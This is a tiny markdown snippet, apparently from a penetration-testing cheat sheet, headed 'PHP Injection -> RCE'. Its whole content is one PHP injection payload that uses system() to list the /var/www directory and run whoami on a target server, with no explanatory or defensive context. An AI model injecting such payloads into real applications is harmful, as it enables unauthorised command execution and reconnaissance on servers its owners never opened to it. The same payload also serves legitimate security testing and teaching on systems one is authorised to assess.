# PHP

## PHP Injection -> RCE

```
echo "<pre>";system("ls -la /var/www");echo"</pre>";system("whoami");
```
